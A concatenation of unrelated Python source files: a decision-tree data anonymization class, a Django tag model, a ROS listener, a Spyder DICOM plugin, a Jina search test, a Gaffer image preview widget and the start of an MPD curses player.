if self.train_only_QI:
used_features = self.features_to_minimize
for feature in self.categorical_features:
if feature in used_features:
try:
all_values = X.loc[:, feature]
values = list(all_values.unique())
self.categorical_values[feature] = values
X[feature] = pd.Categorical(X.loc[:, feature], categories=values, ordered=False)
ohe = pd.get_dummies(X[feature], prefix=feature)
for oneHotVectorFeature in ohe.columns:
self.oneHotVectorFeaturesToFeatures[oneHotVectorFeature] = feature
X = pd.concat([X, ohe], axis=1)
features_to_remove.append(feature)
except KeyError:
print("feature " + feature + "not found in training data")
self.categorical_data = X.drop(features_to_remove, axis=1)
def _cell_contains_numeric(self, f, range, x):
i = self._features.index(f)
# convert x to ndarray to allow indexing
a = np.array(x)
value = a.item(i)
if range['start']:
if value <= range['start']:
return False
if range['end']:
if value > range['end']:
return False
return True
def _cell_contains_categorical(self, f, range, x):
i = self._features.index(f)
# convert x to ndarray to allow indexing
a = np.array(x)
value = a.item(i)
if value in range:
return True
return False
    def _calculate_cells(self):
        # Rebuild the leaf cells (and the id -> cell index) from the fitted tree.
        self.cells_by_id_ = {}
        self.cells_ = self._calculate_cells_recursive(0)
    def _calculate_cells_recursive(self, node):
        # Walk the fitted tree; each leaf becomes a cell, and every internal
        # node on the way back up narrows the per-feature ranges of the
        # cells found beneath it.
        feature_index = self.dt_.tree_.feature[node]
        if feature_index == -2:
            # this is a leaf (sklearn marks leaves with feature == -2)
            label = self._calculate_cell_label(node)
            hist = [int(i) for i in self.dt_.tree_.value[node][0]]
            cell = {'label': label, 'hist': hist, 'ranges': {}, 'id': int(node)}
            return [cell]
        cells = []
        feature = self.categorical_data.columns[feature_index]
        threshold = self.dt_.tree_.threshold[node]
        left_child = self.dt_.tree_.children_left[node]
        right_child = self.dt_.tree_.children_right[node]
        left_child_cells = self._calculate_cells_recursive(left_child)
        for cell in left_child_cells:
            # left subtree satisfies feature <= threshold: cap the range end
            # (only if a deeper node has not already capped it)
            if feature not in cell['ranges'].keys():
                cell['ranges'][feature] = {'start': None, 'end': None}
            if cell['ranges'][feature]['end'] is None:
                cell['ranges'][feature]['end'] = threshold
            cells.append(cell)
            self.cells_by_id_[cell['id']] = cell
        right_child_cells = self._calculate_cells_recursive(right_child)
        for cell in right_child_cells:
            # right subtree satisfies feature > threshold: raise the range start
            if feature not in cell['ranges'].keys():
                cell['ranges'][feature] = {'start': None, 'end': None}
            if cell['ranges'][feature]['start'] is None:
                cell['ranges'][feature]['start'] = threshold
            cells.append(cell)
            self.cells_by_id_[cell['id']] = cell
        return cells
def _calculate_cell_label(self, node):
label_hist = self.dt_.tree_.value[node][0]
return int(self.dt_.classes_[np.argmax(label_hist)])
    def _modify_cells(self):
        # Translate cells expressed over one-hot encoded columns back into
        # cells over the original features: numeric columns keep their
        # ranges, while dummy-column splits become category subsets.
        cells = []
        features = self.categorical_data.columns
        for cell in self.cells_:
            new_cell = {'id': cell['id'], 'label': cell['label'], 'ranges': {}, 'categories': {}, 'hist': cell['hist'],
                        'representative': None}
            for feature in features:
                if feature in self.oneHotVectorFeaturesToFeatures.keys():
                    # feature is categorical and should be mapped
                    categorical_feature = self.oneHotVectorFeaturesToFeatures[feature]
                    if categorical_feature not in new_cell['categories'].keys():
                        # start from all observed values and narrow down
                        new_cell['categories'][categorical_feature] = self.categorical_values[
                            categorical_feature].copy()
                    if feature in cell['ranges'].keys():
                        # dummy column name is "<feature>_<value>"
                        categorical_value = feature[len(categorical_feature) + 1:]
                        if cell['ranges'][feature]['start'] is not None:
                            # categorical feature must have this value
                            new_cell['categories'][categorical_feature] = [categorical_value]
                        else:
                            # categorical feature can not have this value
                            if categorical_value in new_cell['categories'][categorical_feature]:
                                new_cell['categories'][categorical_feature].remove(categorical_value)
                else:
                    if feature in cell['ranges'].keys():
                        new_cell['ranges'][feature] = cell['ranges'][feature]
                    else:
                        # feature was never split on: unbounded range
                        new_cell['ranges'][feature] = {'start': None, 'end': None}
            cells.append(new_cell)
            self.cells_by_id_[new_cell['id']] = new_cell
        self.cells_ = cells
def _calculate_level_cells(self, level):
if level < 0 or level > self.dt_.get_depth():
raise TypeError("Illegal level %d' % level", level)
if level > 0:
new_cells = []
new_cells_by_id = {}
nodes = self._get_nodes_level(level)
if nodes:
for node in nodes:
if self.dt_.tree_.feature[node] == -2: # leaf node
new_cell = self.cells_by_id_[node]
else:
left_child = self.dt_.tree_.children_left[node]
right_child = self.dt_.tree_.children_right[node]
left_cell = self.cells_by_id_[left_child]
right_cell = self.cells_by_id_[right_child]
new_cell = {'id': int(node), 'ranges': {}, 'categories': {}, 'untouched': [],
'label': None, 'representative': None}
for feature in left_cell['ranges'].keys():
new_cell['ranges'][feature] = {}
new_cell['ranges'][feature]['start'] = left_cell['ranges'][feature]['start']
new_cell['ranges'][feature]['end'] = right_cell['ranges'][feature]['start']
for feature in left_cell['categories'].keys():
new_cell['categories'][feature] = \
list(set(left_cell['categories'][feature]) |
set(right_cell['categories'][feature]))
for feature in left_cell['untouched']:
if feature in right_cell['untouched']:
new_cell['untouched'].append(feature)
self._calculate_level_cell_label(left_cell, right_cell, new_cell)
new_cells.append(new_cell)
new_cells_by_id[new_cell['id']] = new_cell
self.cells_ = new_cells
self.cells_by_id_ = new_cells_by_id
# else: nothing to do, stay with previous cells
def _calculate_level_cell_label(self, left_cell, right_cell, new_cell):
new_cell['hist'] = [x + y for x, y in zip(left_cell['hist'], right_cell['hist'])]
new_cell['label'] = int(self.dt_.classes_[np.argmax(new_cell['hist'])])
    def _get_nodes_level(self, level):
        # level = distance from lowest leaf
        # Returns the ids of all nodes at that distance from the deepest
        # leaf, plus any leaves that sit higher up in the tree.
        node_depth = np.zeros(shape=self.dt_.tree_.node_count, dtype=np.int64)
        is_leaves = np.zeros(shape=self.dt_.tree_.node_count, dtype=bool)
        stack = [(0, -1)]  # seed is the root node id and its parent depth
        # iterative DFS to compute each node's depth and leaf status
        while len(stack) > 0:
            node_id, parent_depth = stack.pop()
            # depth = distance from root
            node_depth[node_id] = parent_depth + 1
            if self.dt_.tree_.children_left[node_id] != self.dt_.tree_.children_right[node_id]:
                stack.append((self.dt_.tree_.children_left[node_id], parent_depth + 1))
                stack.append((self.dt_.tree_.children_right[node_id], parent_depth + 1))
            else:
                is_leaves[node_id] = True
        # depth of entire tree
        max_depth = max(node_depth)
        # depth of current level
        depth = max_depth - level
        # level is higher than root
        if depth < 0:
            return None
        # return all nodes with depth == level or leaves higher than level
        return [i for i, x in enumerate(node_depth) if x == depth or (x < depth and is_leaves[i])]
    def _attach_cells_representatives(self, prepared_data, originalTrainFeatures, labelFeature, level_nodes):
        # prepared data include one hot encoded categorical data,
        # if there is no categorical data prepared data is original data
        # For each cell, pick as representative the original training row
        # (with a matching label) whose encoded form is closest to the
        # median of the cell's matching rows.
        nodeIds = self._find_sample_nodes(prepared_data, level_nodes)
        labels_df = pd.DataFrame(labelFeature, columns=['label'])
        for cell in self.cells_:
            cell['representative'] = {}
            # get all rows in cell
            indexes = [i for i, x in enumerate(nodeIds) if x == cell['id']]
            original_rows = originalTrainFeatures.iloc[indexes]
            sample_rows = prepared_data.iloc[indexes]
            sample_labels = labels_df.iloc[indexes]['label'].values.tolist()
            # get rows with matching label
            # NOTE(review): if no row in the cell has the cell's label this
            # yields an empty selection and np.median/iloc below would fail
            # — presumably the majority label guarantees at least one match;
            # confirm.
            indexes = [i for i, label in enumerate(sample_labels) if label == cell['label']]
            match_samples = sample_rows.iloc[indexes]
            match_rows = original_rows.iloc[indexes]
            # find the "middle" of the cluster
            array = match_samples.values
            # Only works with numpy 1.9.0 and higher!!!
            median = np.median(array, axis=0)
            i = 0
            # 'min' here shadows the builtin: it tracks the index of the
            # row closest to the median (min_dist tracks its distance)
            min = len(array)
            min_dist = float("inf")
            for row in array:
                dist = distance.euclidean(row, median)
                if dist < min_dist:
                    min_dist = dist
                    min = i
                i = i + 1
            row = match_rows.iloc[min]
            # copy the chosen row's original values as the representative
            for feature in cell['ranges'].keys():
                cell['representative'][feature] = row[feature]
            for feature in cell['categories'].keys():
                cell['representative'][feature] = row[feature]
    def _find_sample_nodes(self, samples, nodes):
        # decision_path yields one 0/1 row per sample marking visited tree
        # nodes; intersect each path with the requested node set (assumed
        # to contain exactly one node per path) and return that node id.
        paths = self.dt_.decision_path(samples).toarray()
        nodeSet = set(nodes)
        return [(list(set([i for i, v in enumerate(p) if v == 1]) & nodeSet))[0] for p in paths]
    def _generalize(self, original_data, prepared_data, level_nodes, cells, cells_by_id):
        # prepared data include one hot encoded categorical data + QI
        # Replace each record's generalized features with the representative
        # values of the cell it falls into; other features stay as-is.
        representatives = pd.DataFrame(columns=self._features)  # empty except for columns
        generalized = pd.DataFrame(prepared_data, columns=self.categorical_data.columns, copy=True)
        original_data_generalized = pd.DataFrame(original_data, columns=self._features, copy=True)
        mapping_to_cells = self._map_to_cells(generalized, level_nodes, cells_by_id)
        # iterate over cells (leaves in decision tree)
        for i in range(len(cells)):
            # This code just copies the representatives from the cells into another data structure
            # iterate over features
            for feature in self._features:
                # if feature has a representative value in the cell and should not be left untouched,
                # take the representative value
                if feature in cells[i]['representative'] and ('untouched' not in cells[i] or
                                                              feature not in cells[i]['untouched']):
                    representatives.loc[i, feature] = cells[i]['representative'][feature]
                # else, drop the feature (removes from representatives columns that do not have a
                # representative value or should remain untouched)
                elif feature in representatives.columns.tolist():
                    representatives = representatives.drop(feature, axis=1)

            # get the indexes of all records that map to this cell
            indexes = [j for j in mapping_to_cells if mapping_to_cells[j]['id'] == cells[i]['id']]
            # replaces the values in the representative columns with the representative values
            # (leaves others untouched)
            if indexes and not representatives.columns.empty:
                if len(indexes) > 1:
                    replace = pd.concat([representatives.loc[i].to_frame().T] * len(indexes)).reset_index(drop=True)
                else:
                    replace = representatives.loc[i].to_frame().T.reset_index(drop=True)
                replace.index = indexes
                replace = pd.DataFrame(replace, indexes, columns=self._features)
                original_data_generalized.loc[indexes, representatives.columns.tolist()] = replace
        return original_data_generalized
def _map_to_cells(self, samples, nodes, cells_by_id):
mapping_to_cells = {}
for index, row in samples.iterrows():
cell = self._find_sample_cells([row], nodes, cells_by_id)[0]
mapping_to_cells[index] = cell
return mapping_to_cells
def _find_sample_cells(self, samples, nodes, cells_by_id):
node_ids = self._find_sample_nodes(samples, nodes)
return [cells_by_id[nodeId] for nodeId in node_ids]
def _remove_feature_from_generalization(self, original_data, prepared_data, nodes, labels, feature_data,
current_accuracy):
# prepared data include one hot encoded categorical data,
# if there is no categorical data prepared data is original data
feature = self._get_feature_to_remove(original_data, prepared_data, nodes, labels, feature_data,
current_accuracy)
if feature is None:
return None
GeneralizeToRepresentative._remove_feature_from_cells(self.cells_, self.cells_by_id_, feature)
return feature
    def _get_feature_to_remove(self, original_data, prepared_data, nodes, labels, feature_data, current_accuracy):
        # prepared data include one hot encoded categorical data,
        # if there is no categorical data prepared data is original data
        # We want to remove features with low iLoss (NCP) and high accuracy gain
        # (after removing them)
        # NOTE(review): the numeric and categorical loops below are nearly
        # identical (only the NCP function differs) — candidate for a shared
        # helper.
        ranges = self.generalizations_['ranges']
        range_counts = self._find_range_count(original_data, ranges)
        total = prepared_data.size
        range_min = sys.float_info.max
        remove_feature = None
        categories = self.generalizations['categories']
        category_counts = self._find_categories_count(original_data, categories)
        for feature in ranges.keys():
            if feature not in self.generalizations_['untouched']:
                feature_ncp = self._calc_ncp_numeric(ranges[feature],
                                                     range_counts[feature],
                                                     feature_data[feature],
                                                     total)
                if feature_ncp > 0:
                    # divide by accuracy gain
                    # (score the removal on a deep copy so self.cells_ is untouched)
                    new_cells = copy.deepcopy(self.cells_)
                    cells_by_id = copy.deepcopy(self.cells_by_id_)
                    GeneralizeToRepresentative._remove_feature_from_cells(new_cells, cells_by_id, feature)
                    generalized = self._generalize(original_data, prepared_data, nodes, new_cells, cells_by_id)
                    accuracy_gain = self.estimator.score(self._preprocessor.transform(generalized),
                                                         labels) - current_accuracy
                    if accuracy_gain < 0:
                        accuracy_gain = 0
                    if accuracy_gain != 0:
                        feature_ncp = feature_ncp / accuracy_gain
                if feature_ncp < range_min:
                    range_min = feature_ncp
                    remove_feature = feature
        for feature in categories.keys():
            if feature not in self.generalizations['untouched']:
                feature_ncp = self._calc_ncp_categorical(categories[feature],
                                                         category_counts[feature],
                                                         feature_data[feature],
                                                         total)
                if feature_ncp > 0:
                    # divide by accuracy loss
                    new_cells = copy.deepcopy(self.cells_)
                    cells_by_id = copy.deepcopy(self.cells_by_id_)
                    GeneralizeToRepresentative._remove_feature_from_cells(new_cells, cells_by_id, feature)
                    generalized = self._generalize(original_data, prepared_data, nodes, new_cells, cells_by_id)
                    accuracy_gain = self.estimator.score(self._preprocessor.transform(generalized),
                                                         labels) - current_accuracy
                    if accuracy_gain < 0:
                        accuracy_gain = 0
                    if accuracy_gain != 0:
                        feature_ncp = feature_ncp / accuracy_gain
                if feature_ncp < range_min:
                    range_min = feature_ncp
                    remove_feature = feature

        print('feature to remove: ' + (str(remove_feature) if remove_feature is not None else 'none'))
        return remove_feature
def _calculate_generalizations(self):
    # Rebuild the generalization description from the fitted cells:
    # numeric split points, categorical value partitions, and the set of
    # features left untouched by every cell.
    self.generalizations_ = {'ranges': GeneralizeToRepresentative._calculate_ranges(self.cells_),
                             'categories': GeneralizeToRepresentative._calculate_categories(self.cells_),
                             'untouched': GeneralizeToRepresentative._calculate_untouched(self.cells_)}
def _find_range_count(self, samples, ranges):
    """Count, per numeric feature, how many samples fall at or below each split value.

    Returns a dict mapping feature name to a list of cumulative counts:
    one entry per split value, plus a final entry repeating the count for
    the last split. A feature with no splits gets the total sample count.
    """
    samples_df = pd.DataFrame(samples, columns=self.categorical_data.columns)
    range_counts = {}
    last_value = None
    for r in ranges.keys():
        range_counts[r] = []
        # if empty list, all samples should be counted
        if not ranges[r]:
            range_counts[r].append(samples_df.shape[0])
        else:
            for value in ranges[r]:
                # NOTE(review): assumes feature values are castable to int — confirm
                counter = [item for item in samples_df[r] if int(item) <= value]
                range_counts[r].append(len(counter))
                last_value = value
            # Repeat the count for the last split so the list has one more
            # entry than there are splits (matches the range partitioning).
            counter = [item for item in samples_df[r] if int(item) <= last_value]
            range_counts[r].append(len(counter))
    return range_counts
def _find_categories_count(self, samples, categories):
    """Count, per categorical feature, how many samples fall into each value group.

    ``categories[c]`` is a list of partitions (each a list of raw values);
    the result maps each feature to one count per partition.
    """
    category_counts = {}
    for c in categories.keys():
        category_counts[c] = []
        for value in categories[c]:
            # 'value' is one partition: a list of category values.
            category_counts[c].append(len(samples.loc[samples[c].isin(value)]))
    return category_counts
def _calculate_ncp(self, samples, generalizations, feature_data):
    """Return the average NCP (information-loss) score across all features.

    Untouched features contribute zero loss but are counted in the
    denominator; suppressed features are already handled inside
    _calc_ncp_numeric (they score 1).
    """
    # supressed features are already taken care of within _calc_ncp_numeric
    ranges = generalizations['ranges']
    categories = generalizations['categories']
    range_counts = self._find_range_count(samples, ranges)
    category_counts = self._find_categories_count(samples, categories)
    total = samples.shape[0]
    total_ncp = 0
    total_features = len(generalizations['untouched'])
    for feature in ranges.keys():
        feature_ncp = self._calc_ncp_numeric(ranges[feature], range_counts[feature],
                                             feature_data[feature], total)
        total_ncp = total_ncp + feature_ncp
        total_features += 1
    for feature in categories.keys():
        # renamed from camelCase `featureNCP` for consistency with the rest
        # of the class
        feature_ncp = self._calc_ncp_categorical(categories[feature], category_counts[feature],
                                                 feature_data[feature],
                                                 total)
        total_ncp = total_ncp + feature_ncp
        total_features += 1
    if total_features == 0:
        return 0
    return total_ncp / total_features
@staticmethod
def _calculate_ranges(cells):
    """Collect, per numeric feature, the sorted unique range endpoints
    (start/end values) appearing in any cell, skipping untouched features."""
    endpoints_by_feature = {}
    for cell in cells:
        skip = cell['untouched'] if 'untouched' in cell else []
        for feature, bounds in cell['ranges'].items():
            if feature in skip:
                continue
            endpoints = endpoints_by_feature.setdefault(feature, [])
            if bounds['start'] is not None:
                endpoints.append(bounds['start'])
            if bounds['end'] is not None:
                endpoints.append(bounds['end'])
    # Deduplicate and sort each feature's endpoint list.
    return {feature: sorted(set(endpoints))
            for feature, endpoints in endpoints_by_feature.items()}
@staticmethod
def _calculate_categories(cells):
    """Partition each categorical feature's values into groups the cells never separate.

    Two values land in the same partition iff every cell contains either
    both of them or neither (see _are_inseparable). Returns a dict mapping
    feature name to a list of partitions (each a list of values).
    """
    categories = {}
    categorical_features_values = GeneralizeToRepresentative._calculate_categorical_features_values(cells)
    for feature in categorical_features_values.keys():
        partitions = []
        values = categorical_features_values[feature]
        assigned = []  # values already placed in some partition
        for i in range(len(values)):
            value1 = values[i]
            if value1 in assigned:
                continue
            partition = [value1]
            assigned.append(value1)
            for j in range(len(values)):
                # only look at later values to avoid duplicate pairs
                if j <= i:
                    continue
                value2 = values[j]
                if GeneralizeToRepresentative._are_inseparable(cells, feature, value1, value2):
                    partition.append(value2)
                    assigned.append(value2)
            partitions.append(partition)
        categories[feature] = partitions
    return categories
@staticmethod
def _calculate_categorical_features_values(cells):
    """Return, per categorical feature, the ordered list of distinct values
    seen in any cell, skipping features marked untouched for that cell."""
    values_per_feature = {}
    for cell in cells:
        skip = cell['untouched'] if 'untouched' in cell else []
        for feature, cell_values in cell['categories'].items():
            if feature in skip:
                continue
            seen = values_per_feature.setdefault(feature, [])
            # Preserve first-seen order while deduplicating.
            for value in cell_values:
                if value not in seen:
                    seen.append(value)
    return values_per_feature
@staticmethod
def _are_inseparable(cells, feature, value1, value2):
    """True iff no cell distinguishes value1 from value2 for *feature*
    (every cell containing the feature has either both values or neither)."""
    for cell in cells:
        members = cell['categories'].get(feature)
        if members is None:
            continue
        # Separated as soon as exactly one of the two values is present.
        if (value1 in members) != (value2 in members):
            return False
    return True
@staticmethod
def _calculate_untouched(cells):
    """Return the features marked 'untouched' in every cell (intersection).

    Assumes ``cells`` is non-empty, as in the original implementation.
    """
    per_cell = [cell.get('untouched', []) for cell in cells]
    common = set(per_cell[0]).intersection(*per_cell)
    return list(common)
@staticmethod
def _calc_ncp_categorical(categories, categoryCount, feature_data, total):
    """NCP loss for one categorical feature.

    Sample-weighted average partition size, normalized by the feature's
    total number of values (feature_data['range']). Singleton partitions
    incur no loss.
    """
    category_sizes = [len(g) if len(g) > 1 else 0 for g in categories]
    normalized_category_sizes = [s * n / total for s, n in zip(category_sizes, categoryCount)]
    average_group_size = sum(normalized_category_sizes) / len(normalized_category_sizes)
    return average_group_size / feature_data['range']  # number of values in category
@staticmethod
def _calc_ncp_numeric(feature_range, range_count, feature_data, total):
    """NCP loss for one numeric feature.

    Sample-weighted average sub-range size normalized by the feature's
    full span. A suppressed feature (no split values) scores maximal
    loss 1.
    """
    # if there are no ranges, feature is supressed and iLoss is 1
    if not feature_range:
        return 1
    # range only contains the split values, need to add min and max value of feature
    # to enable computing sizes of all ranges
    new_range = [feature_data['min']] + feature_range + [feature_data['max']]
    # pairwise differences between consecutive boundaries
    range_sizes = [b - a for a, b in zip(new_range[::1], new_range[1::1])]
    normalized_range_sizes = [s * n / total for s, n in zip(range_sizes, range_count)]
    average_range_size = sum(normalized_range_sizes) / len(normalized_range_sizes)
    return average_range_size / (feature_data['max'] - feature_data['min'])
@staticmethod
def _remove_feature_from_cells(cells, cells_by_id, feature):
    """Drop *feature* from every cell's ranges/categories, mark it untouched,
    and keep the cells_by_id index in sync (stores a shallow copy per cell)."""
    for cell in cells:
        if 'untouched' not in cell:
            cell['untouched'] = []
        if feature in cell['ranges'].keys():
            del cell['ranges'][feature]
        elif feature in cell['categories'].keys():
            del cell['categories'][feature]
        cell['untouched'].append(feature)
        cells_by_id[cell['id']] = cell.copy()
| StarcoderdataPython |
3309040 | # -*- encoding: utf-8 -*-
'''
Created on 2012-3-22
@author: Neil
'''
from django.db import models
class Tag(models.Model):
    """
    Data model for a tag.
    """
    # Tag text shown to users; must be unique.
    name = models.CharField(max_length=20, unique=True)
    # Number of times the tag has been used; starts at 1 on creation.
    used_count = models.IntegerField(default=1)
    # created_at = models.DateTimeField(default=datetime.datetime.now())
    created_at = models.DateTimeField(auto_now_add=True)

    def __unicode__(self):
        # Python 2 string representation (e.g. for the Django admin).
        return self.name

    class Meta:
        ordering = ['id']
        app_label = 'glow'
| StarcoderdataPython |
1642012 | #!/usr/bin/env python3
'''
@file listener.py
@package py3_listner
@author CVH95
@email <EMAIL>
@brief Fibonacci listener
Copyright (C) 2021 MIT License
'''
import rospy
from std_msgs.msg import *
class Listener:
    """ROS node helper: subscribes to the Fibonacci topic and logs each value."""

    def __init__(self):
        # Last Fibonacci value received (0 until the first message arrives).
        self.fibonacci = 0
        self.subscriber = rospy.Subscriber(
            'innosold/process/layer', Int64, self.callback)
        # Print a summary when the node shuts down.
        rospy.on_shutdown(self.close)

    def callback(self, msg):
        """Store and log the incoming Int64 value."""
        self.fibonacci = msg.data
        rospy.loginfo('Fibonacci value: %d' % self.fibonacci)

    def close(self):
        """Shutdown hook: report the last value seen."""
        print('\nLast value received: %d' % self.fibonacci)
| StarcoderdataPython |
36138 | """Pauses the execution."""
import time
from dodo_commands.framework.decorator_utils import uses_decorator
class Decorator:
    """Dodo Commands decorator that pauses before a command runs."""

    def is_used(self, config, command_name, decorator_name):
        # Only active for commands that opt into this decorator in the config.
        return uses_decorator(config, command_name, decorator_name)

    def add_arguments(self, parser):  # override
        parser.add_argument(
            "--pause-ms", type=int, help="Pause in milliseconds before continuing"
        )

    def modify_args(self, command_line_args, args_tree_root_node, cwd):  # override
        # Sleep for the requested duration (if any), then pass args through
        # unchanged.
        if getattr(command_line_args, "pause_ms", 0):
            time.sleep(command_line_args.pause_ms / 1000)
        return args_tree_root_node, cwd
| StarcoderdataPython |
4803286 | <filename>spyder/plugins/io_dcm/__init__.py<gh_stars>1000+
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2009- Spyder Project Contributors
#
# Distributed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
# =============================================================================
# The following statements are required to register this I/O plugin:
# =============================================================================
from .plugin import load_dicom
# Registration constants consumed by Spyder's I/O plugin loader.
FORMAT_NAME = "DICOM images"
FORMAT_EXT = ".dcm"
FORMAT_LOAD = load_dicom
FORMAT_SAVE = None  # saving DICOM images is not supported
| StarcoderdataPython |
1721228 | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 9 12:12:48 2021
@author: rdavi
Preprocess datasets, including silence trimming and spliting in 1s chunks
"""
# %% Import libraries
import os
import numpy as np
import opensmile
import pickle
import librosa
import matplotlib.pyplot as plt
# %% Define the dataset
dataset = 'DEMOS'
# dataset = 'RAVDESS'
# dataset = 'TESS'
# dataset = 'AEMOTION'
path = '../../data/raw/' +dataset+ '_Emotions/'
# %% Extract features
def load_wav(filename):
    """Load an audio file resampled to 16 kHz and trim silence around the
    first non-silent interval (20 dB threshold)."""
    audio, fs = librosa.load(filename, sr=16000)
    # librosa.effects.split returns (start, end) sample indices of
    # non-silent intervals; keep only the first one.
    intervals = librosa.effects.split(audio, top_db=20, frame_length=4096, hop_length=1)
    first_start, first_end = intervals[0]
    return audio[first_start:first_end], fs
# Initialize opensmile feature set
smile = opensmile.Smile(feature_set=opensmile.FeatureSet.eGeMAPSv02,
                        feature_level=opensmile.FeatureLevel.LowLevelDescriptors)

# Sweep all class sub-folders; the folder index `i` is used as the label
# (starts at -2 so the root walk iteration maps the first class to 0 —
# NOTE(review): verify this offset matches the directory layout).
lst = []
i = -2
duration = 3  # define signal duration (seconds) in each chunk
for subdir, dirs, files in os.walk(path):
    i+=1
    print(subdir)
    print(i)
    for file in files:
        # Load file
        filename = os.path.join(subdir,file)
        data, Fs = load_wav(filename)
        # Make a fixed-length chunk of `duration` seconds
        N = int(np.floor(duration*Fs))  # number of samples in `duration` seconds
        data_chunk = np.empty(shape=(N))
        if np.size(data) > N:
            data = data[:N]
        data_chunk[:np.size(data)] = data
        # Opensmile feature extraction
        X_smile = smile.process_signal(data_chunk, Fs)
        # Append (features, label) to the list
        arr = X_smile.values, i
        lst.append(arr)

# %% Save smile dataset
X, y = zip(*lst)
X, y = np.asarray(X), np.asarray(y)
with open('../../data/processed/dataset_smile_' +dataset+ '.pckl', 'wb') as f:
    pickle.dump([X, y], f)
print("All done!")
# %%
| StarcoderdataPython |
3329321 | <gh_stars>1-10
__copyright__ = "Copyright (c) 2021 Jina AI Limited. All rights reserved."
__license__ = "Apache-2.0"
import os
import sys
import pytest
from click.testing import CliRunner
sys.path.append('..')
from app import main
def config(tmpdir):
    """Point the app at the bundled toy dataset and a per-test workspace
    via environment variables."""
    data_file = os.path.join(os.path.dirname(__file__), 'toy-input.txt')
    os.environ['JINA_DATA_FILE'] = data_file
    os.environ['JINA_WORKSPACE'] = os.path.join(tmpdir, 'workspace')
# TODO: query_restful is not covered.
@pytest.mark.parametrize('task_para',
[('index',
'Their land was taken back by the Spanish Crown',
'California became part of the United States',
'> 49('),
('index_incremental',
'<NAME>',
'multi-Emmy Award Winning American',
'> 99(')
])
def test_wikipediasearch_index(tmpdir, task_para):
task_str, input_str, output_str, last_str = task_para
config(tmpdir)
runner = CliRunner()
result = runner.invoke(main, ['-t', task_str])
assert 'done in' in result.stdout
result = runner.invoke(main, ['-t', 'query', '-k', '200'], input=input_str)
assert output_str in result.stdout
assert last_str in result.stdout
| StarcoderdataPython |
116193 | ##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferImage
class ImageReaderPathPreview( GafferUI.PathPreviewWidget ) :
    """Path preview widget that displays image files (and image sequences)
    using a private ScriptNode containing a GafferImage.ImageReader."""

    def __init__( self, path ) :
        column = GafferUI.SplitContainer( GafferUI.SplitContainer.Orientation.Vertical )
        GafferUI.PathPreviewWidget.__init__( self, column, path )
        # Private script hosting the reader node; the Viewer below renders it.
        self.__script = Gaffer.ScriptNode( "imagePreview" )
        self.__script["ImageReader"] = GafferImage.ImageReader()
        with column :
            self.__viewer = GafferUI.Viewer( self.__script )
            GafferUI.Timeline( self.__script )
        self._updateFromPath()

    def isValid( self ) :
        # Previewable iff the path is a leaf file (or file sequence) with an
        # extension the ImageReader supports.
        path = self.getPath()
        if not isinstance( path, ( Gaffer.FileSystemPath, Gaffer.SequencePath ) ) or not path.isLeaf() :
            return False
        if isinstance( path, Gaffer.SequencePath ) :
            try :
                sequence = IECore.FileSequence( str( path ) )
                ext = sequence.fileName.split( "." )[-1]
            except :
                return False
        else :
            ext = str(path).split( "." )[-1]
        return ext in GafferImage.ImageReader.supportedExtensions()

    def _updateFromPath( self ) :
        # Point the reader at the current path, configure the frame range for
        # sequences, and frame the image in the viewport.
        if not self.isValid() :
            self.__script.selection().clear()
            return
        path = self.getPath()
        if isinstance( path, Gaffer.SequencePath ) :
            try :
                sequence = IECore.FileSequence( str( path ) )
            except :
                return
            fileName = sequence.fileName
            frames = sequence.frameList.asList()
        else :
            fileName = str( path )
            frames = None
        self.__script["ImageReader"]["fileName"].setValue( fileName )
        if frames :
            # Start playback on the first frame and clamp the timeline to the
            # sequence's range.
            self.__script.context().setFrame( frames[0] )
            self.__script["frameRange"]["start"].setValue( frames[0] )
            self.__script["frameRange"]["end"].setValue( frames[-1] )
            GafferUI.Playback.acquire( self.__script.context() ).setFrameRange( frames[0], frames[-1] )
        self.__script.selection().add( self.__script["ImageReader"] )
        with self.__script.context() :
            viewport = self.__viewer.viewGadgetWidget().getViewportGadget()
            if viewport.getPrimaryChild() is not None :
                viewport.frame( viewport.getPrimaryChild().bound() )

# Register this preview for the "Image" type so path browsers can use it.
GafferUI.PathPreviewWidget.registerType( "Image", ImageReaderPathPreview )
| StarcoderdataPython |
3228186 | #!/bin/python
import curses
import os
from mpd import MPDClient
import ffmpeg
import pixcat
import time
import configparser
import ueberzug.lib.v0 as ueberzug
from PIL import Image, ImageDraw
# Get config from ~/.config/miniplayer/config, filling in defaults for any
# missing section.
config = configparser.ConfigParser()
config.read(os.path.expanduser("~/.config/miniplayer/config"))
if "player" not in config.sections():
    config["player"] = {"music_directory": "~/Music",
                        "font_width": 11,
                        "font_height": 24,
                        "image_method": "pixcat",
                        "album_art_only": False,
                        "volume_step": 5,
                        "auto_close": False,
                        "show_playlist": True,
                        }

